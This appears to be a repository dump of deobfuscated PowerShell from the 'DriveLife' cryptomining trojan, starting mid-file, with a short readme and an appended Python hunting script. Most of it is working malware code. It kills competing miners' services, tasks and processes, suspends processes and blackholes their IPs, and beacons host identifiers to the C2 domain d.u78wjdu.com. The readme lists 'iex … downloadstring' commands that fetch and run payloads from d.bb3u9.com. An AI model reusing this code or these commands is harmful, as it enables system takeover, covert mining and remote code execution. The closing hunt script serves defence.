select-object -first 1 $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $comp_name = $env:COMPUTERNAME if($ip -eq ''){ $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid" } else { $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname" } (New-Object Net.WebClient).DownloadString($url) }catch{} } function banIp($ip){ route add $ip 0.0.0.0 IF 1 -p } function unbanIp($ip){ route delete $ip 0.0.0.0 } Function Killer { $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks" write-host "kill services..." 
foreach($Srv in $SrvName) { $Null = SC.exe Config $Srv Start= Disabled $Null = SC.exe Stop $Srv $Null = SC.exe Delete $Srv } $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore" write-host "kill tasks..." foreach ($Task in $TaskName) { SchTasks.exe /Delete /TN $Task /F 2> $Null } $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores" write-host "kill processes..." 
foreach ($m in $Miner) { Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force } $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue if($tm -eq $null){ Start-Process -WindowStyle hidden -FilePath Taskmgr.exe } $tcpconn = NetStat -anop TCP $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42') foreach($tempip in $ipcache){ unbanIp $tempip } $ppids = getprotected write-host "kill connections..." foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if ($line -eq $null) { continue } if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) { $ppids += $line[-1] continue } if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){ $ip,$port = $line[2].split(':') $currpid = $line[-1] if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){ continue } if($global:ipdealcache -contains $line[2]){ ProcessSuspend $currpid banIp $ip continue } write-host "try $ip $port..." if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){ write-host "end http test..." $ismproxy = 0 if((isminerproxy $ip $port) -eq $true){ $ismproxy = 1 } else{ if((isminerproxys $ip $port) -eq $true){ $ismproxy = 2 } } if($ismproxy -ne 0){ ProcessSuspend $currpid banIp $ip $global:ipdealcache += $line[2] sendmsg $line[2] $ismproxy $currpid } } if($ipcache -notcontains $line[2]){$ipcache += $line[2]} } } $global:retry++ } $start_time=Get-Date -UFormat "%s" $global:ipdealcache=@() $global:retry=0 $ser=[System.Net.Sockets.TcpListener]65529 $ser.start() while($true){ if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break} "try to kill..." Killer "kill done..." 
Start-Sleep -Seconds 600 } 26 | m6-1-0.ps1:782: #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 27 | m6-1-0.ps1:812: #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 28 | m6-1-0.ps1:1559: # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx 29 | -------------------------------------------------------------------------------- /DriveLife/powershell-beautiful/kr-1.3.ps1: -------------------------------------------------------------------------------- 1 | if(!$down_url){ 2 | 3 | $down_url = 'http://d.u78wjdu.com' 4 | 5 | } 6 | 7 | try{$version=$ifmd5[0..5]-join""}catch{} 8 | 9 | function isPubIP { 10 | 11 | Param( 12 | 13 | [parameter(Mandatory=$true)][String]$ip 14 | 15 | ) 16 | 17 | $resIps = @( 18 | 19 | @(4026531840L, 3758096384L), 20 | 21 | @(4026531840L, 4026531840L), 22 | 23 | @(4278190080L, 0L), 24 | 25 | @(4278190080L, 167772160L), 26 | 27 | @(4278190080L, 2130706432L), 28 | 29 | @(4290772992L, 1681915904L), 30 | 31 | @(4293918720L, 2886729728L), 32 | 33 | @(4294836224L, 3323068416L), 34 | 35 | @(4294901760L, 2851995648L), 36 | 37 | @(4294901760L, 3232235520L), 38 | 39 | @(4294967040L, 3221225472L), 40 | 41 | @(4294967040L, 3221225984L), 42 | 43 | @(4294967040L, 3227017984L), 44 | 45 | @(4294967040L, 3325256704L), 46 | 47 | @(4294967040L, 3405803776L), 48 | 49 | @(4294967295L, 4294967295L) 50 | 51 | ) 52 | 53 | $iparr = $ip.split(".") 54 | 55 | $iplong = 0 56 | 57 | for($i=3;$i -ge 0; $i--){ 58 | 59 | $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) 60 | 61 | } 62 | 63 | for($j=0;$j -lt $resIps.count;$j++){ 64 | 65 | if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ 66 | 67 | return $false 68 | 69 | } 70 | 71 | } 72 | 73 | return $true 74 | 75 | } 76 | 77 | 78 | function ssl_connect($ip,$port,$send_str){ 79 | 80 | $ret = "" 81 | 82 | try{ 83 | 84 | $socket = New-Object Net.Sockets.TcpClient($ip, $port) 85 | 86 | $sslStream = 
New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) 87 | 88 | $sslStream.ReadTimeout = 5000 89 | 90 | $sslStream.AuthenticateAsClient('') 91 | 92 | $writer = new-object System.IO.StreamWriter($sslStream) 93 | 94 | $reader = new-object System.IO.StreamReader($sslStream) 95 | 96 | $writer.WriteLine($send_str) 97 | 98 | $writer.flush() 99 | 100 | $ret = $reader.ReadLine() 101 | 102 | $socket.close() 103 | 104 | }catch{} 105 | 106 | return $ret 107 | 108 | } 109 | 110 | function raw_connect($ip,$port,$send_str){ 111 | 112 | try{ 113 | 114 | $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) 115 | 116 | $sock = $client.Client 117 | 118 | $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) 119 | 120 | $sock.send(($bytes)) | out-null 121 | 122 | $sock.ReceiveTimeout = 5000 123 | 124 | $res = [Array]::CreateInstance(('byte'), 10000) 125 | 126 | $recv = $sock.Receive($res) 127 | 128 | $res = $res[0..($recv-1)] 129 | 130 | $str = [Text.Encoding]::ASCII.getstring($res) 131 | 132 | return $str 133 | 134 | }catch{} 135 | 136 | return "" 137 | 138 | } 139 | 140 | function ishttp($ip,$port){ 141 | 142 | $data="GET / HTTP/1.1nn" 143 | 144 | $ret = raw_connect $ip $port $data 145 | 146 | if($ret.indexOf("HTTP/1") -ne -1){ 147 | 148 | return $true 149 | 150 | } 151 | 152 | return $false 153 | 154 | } 155 | 156 | function ishttps($ip,$port){ 157 | 158 | $data = "GET / HTTP/1.1nn" 159 | 160 | $ret = ssl_connect $ip $port $data 161 | 162 | if($ret.indexOf("HTTP/1") -ne -1){ 163 | 164 | return $true 165 | 166 | } 167 | 168 | return $false 169 | 170 | } 171 | 172 | function isminerproxy($ip,$port){ 173 | 174 | $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" 175 | 176 | $ret = raw_connect 
$ip $port $data 177 | 178 | if($ret.indexOf("jsonrpc") -ne -1){ 179 | 180 | write-host "miner proxy!!" 181 | 182 | return $true 183 | 184 | } 185 | 186 | return $false 187 | 188 | } 189 | 190 | function isminerproxys($ip,$port){ 191 | 192 | $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' 193 | 194 | $ret = ssl_connect $ip $port $data 195 | 196 | if($ret.indexOf("jsonrpc") -ne -1){ 197 | 198 | write-host "miner proxys!!" 199 | 200 | return $true 201 | 202 | } 203 | 204 | return $false 205 | 206 | } 207 | 208 | Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' 209 | 210 | function ProcessSuspend($id){ 211 | 212 | $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name 213 | 214 | if($procName -eq $null){ 215 | 216 | Write-Host "ERROR: There is no process with an ID of $id" 217 | 218 | return 219 | 220 | } 221 | 222 | Write-host "Attempting to suspend $procName (PID: $id)..." 
    if ($id -le 0) {
        write-host "You didn't input a positive integer"
        return
    }
    $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"}
    if($debug -ne $null){
        $DebugPresent = [IntPtr]::Zero
        $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent)
        if ($debugPresent){
            write-host "There is already a debugger attached to this process"
            return
        }
        $suspend = [Kernel32]::DebugActiveProcess($id)
        if ($suspend -eq $false){
            write-host "ERROR: Unable to suspend $procName (PID: $id)"
        }
        else{
            write-host "The $procName process (PID: $id) was successfully suspended!"
        }
    }
    else{
        write-host "ERROR: You do not have debugging privileges to pause any process"
        return
    }
}

function gmd5($d){
    [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')}
    return $l
}

function getprotected(){
    function getrname(){
        function gmd5($d){
            [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')}
            return $l
        }
        $rpath="C:\Windows\System32\Windowspowershell\V1.0"
        $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}
        $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))
        foreach($ename in $enames){
            $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
            if($tmd5 -eq $md5_){
                return $ename
            }
        }
        return "NULLNULL"
    }
    $comp_name = $env:COMPUTERNAME
    $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
    $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
    $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6)
    $pids=@()
    $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid}
    return $pids
}

function sendmsg($ip,$ismproxy,$mpid){
    try{
        $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
        $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
        $comp_name = $env:COMPUTERNAME
        if($ip -eq ''){
            $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid"
        } else {
            $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name
            $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname"
        }
        (New-Object Net.WebClient).DownloadString($url)
    }catch{}
}

function banIp($ip){
    route add $ip 0.0.0.0 IF 1 -p
}

function unbanIp($ip){
    route delete $ip 0.0.0.0
}

Function Killer {
    $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"
    write-host "kill services..."
    foreach($Srv in $SrvName) {
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
        $Null = SC.exe Delete $Srv
    }

    $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"
    write-host "kill tasks..."
    foreach ($Task in $TaskName) {
        SchTasks.exe /Delete /TN $Task /F 2> $Null
    }

    $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost",
    "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update",
    "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"
    write-host "kill processes..."
    foreach ($m in $Miner) {
        Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue

    if($tm -eq $null){
        Start-Process -WindowStyle hidden -FilePath Taskmgr.exe
    }
    $tcpconn = NetStat -anop TCP
    $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42')
    foreach($tempip in $ipcache){
        unbanIp $tempip
    }
    $ppids = getprotected
    write-host "kill connections..."
    foreach ($t in $tcpconn) {
        $line = $t.split(' ')| ? {$_}
        if ($line -eq $null) { continue }
        if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) {
            $ppids += $line[-1]
            continue
        }
        if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){
            $ip,$port = $line[2].split(':')
            $currpid = $line[-1]
            if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){
                continue
            }
            if($global:ipdealcache -contains $line[2]){
                ProcessSuspend $currpid
                banIp $ip
                continue
            }
            write-host "try $ip $port..."
            if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){
                write-host "end http test..."
                $ismproxy = 0
                if((isminerproxy $ip $port) -eq $true){
                    $ismproxy = 1
                } else{
                    if((isminerproxys $ip $port) -eq $true){
                        $ismproxy = 2
                    }
                }
                if($ismproxy -ne 0){
                    ProcessSuspend $currpid
                    banIp $ip
                    $global:ipdealcache += $line[2]
                    sendmsg $line[2] $ismproxy $currpid
                }
            }
            if($ipcache -notcontains $line[2]){$ipcache += $line[2]}
        }
    }
    $global:retry++
}

$start_time=Get-Date -UFormat "%s"
$global:ipdealcache=@()
$global:retry=0
$ser=[System.Net.Sockets.TcpListener]65529
$ser.start()
while($true){
    if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break}
    "try to kill..."
    Killer
    "kill done..."
    Start-Sleep -Seconds 600
}

--------------------------------------------------------------------------------
/DriveLife/powershell-beautiful/readme.md:
--------------------------------------------------------------------------------
Suspicious commands
```
/c powershell iex(new-object net.webclient).downloadstring('http://d.bb3u9.com/if.bin?once'),

iex(new-object net.webclient).downloadstring('http://d.bb3u9.com/if.bin?once')

/mimi.dat?v=&r=3
http://bb3u9.com/mimi.dat?v=&r=1
http://bb3u9.com/mimi.dat?v=&r=2
http://bb3u9.com/mimi.dat?v=&r=3
```

Other subdomains

Registration emails

```
ns3.epik.com support.epik.com
257 3 13 SN+RNCXaqYu+ee+A35F6MGWEpNFo58FdWH3Tu6w6L6DVhBlS5muJtgeIFrYWZ8TSiP4W4OZ7I8++8dqFVREeqg==
257 3 13 io+EGen36FvV4MqBsbx0iN9DjbvTO65LY7Vvb9h101HY6p6zSMrfHaV/Pu2/pEefXcGkVykD1dAuj51qwlyROA==
5422ef5ec3b31bbd18808d63faf9366290705050446b33e3ee55560886a944f3
support.epik.com ns3.epik.com
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# DriveLife-PsTrojan
TrojanDropper/PS.Maloader.d

### "DriveLife" virus overview

```
The "DriveLife" virus first appeared in 2018 and has since produced multiple variants, with continual technical refinements to evade detection and removal by security software.
The virus exploits several high-risk vulnerabilities, including EternalBlue and SMBGhost, to compromise and infect Windows and Linux hosts.
After a successful intrusion it not only downloads mining files and starts mining, but also drops a propagation module that goes on to infect other endpoints,
and the PowerShell scripts the virus uses are obfuscated in multiple layers to evade security software.
```

![](./DriveLife/images/BruteSMB.png)
![](./DriveLife/images/GetIpaddrs.png)
--------------------------------------------------------------------------------
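Added example (not part of the repository): a Python hunt over host telemetry for the processes that `getprotected` and the listener checks in the kill script above exempt from suspension, plus the script's own listener on port 65529. The host record, process list and listener list are constructed sample data, the function names are this example's own, and the `getrname` check for a renamed copy of powershell.exe is not covered.

```python
import hashlib

# Values taken from the kill script: listeners on 43668/43669 are added to its
# exempt PID list, and it opens a TcpListener on 65529 before its loop starts.
EXEMPT_PORTS = {43668, 43669}
LOOP_PORT = 65529
STATIC_MARKERS = ("m6g.bin.exe", "m6.bin.exe")


def host_marker(computer_name, uuid, mac):
    """First 6 hex chars of MD5(UTF-8(name + UUID + MAC)), mirroring $m6exe."""
    data = (computer_name + uuid + mac).encode("utf-8")
    return hashlib.md5(data).hexdigest()[:6]


def hunt(host, processes, listeners):
    """Return {pid: [reasons]} for processes matching the script's own markers."""
    needles = STATIC_MARKERS + (host_marker(host["name"], host["uuid"], host["mac"]),)
    hits = {}
    for proc in processes:
        # PowerShell -like is case-insensitive, so compare lower-cased paths.
        path = (proc.get("path") or "").lower()
        for needle in needles:
            if needle in path:
                hits.setdefault(proc["pid"], []).append("path contains " + needle)
    for sock in listeners:
        if sock["port"] in EXEMPT_PORTS:
            hits.setdefault(sock["pid"], []).append("listens on %d" % sock["port"])
        elif sock["port"] == LOOP_PORT:
            hits.setdefault(sock["pid"], []).append("kill-loop listener on 65529")
    return hits


# Constructed sample telemetry, not taken from a real host.
HOST = {"name": "WS-042", "uuid": "4C4C4544-0000-1010-8000-B2C04F000000",
        "mac": "00:11:22:33:44:55"}
MARK = host_marker(HOST["name"], HOST["uuid"], HOST["mac"])
PROCESSES = [
    {"pid": 812, "path": "C:\\Windows\\System32\\svchost.exe"},
    {"pid": 4120, "path": "C:\\Users\\Public\\" + MARK + ".exe"},
    {"pid": 5300, "path": "C:\\Windows\\Temp\\m6.bin.exe"},
]
LISTENERS = [{"pid": 4120, "port": 43669}, {"pid": 6001, "port": 65529},
             {"pid": 812, "port": 135}]

if __name__ == "__main__":
    for pid, reasons in sorted(hunt(HOST, PROCESSES, LISTENERS).items()):
        print(pid, "; ".join(reasons))
```

The per-host marker depends on the exact strings WMI returns for the computer name, UUID and first IP-enabled adapter MAC, so feed it inventory values in that same form.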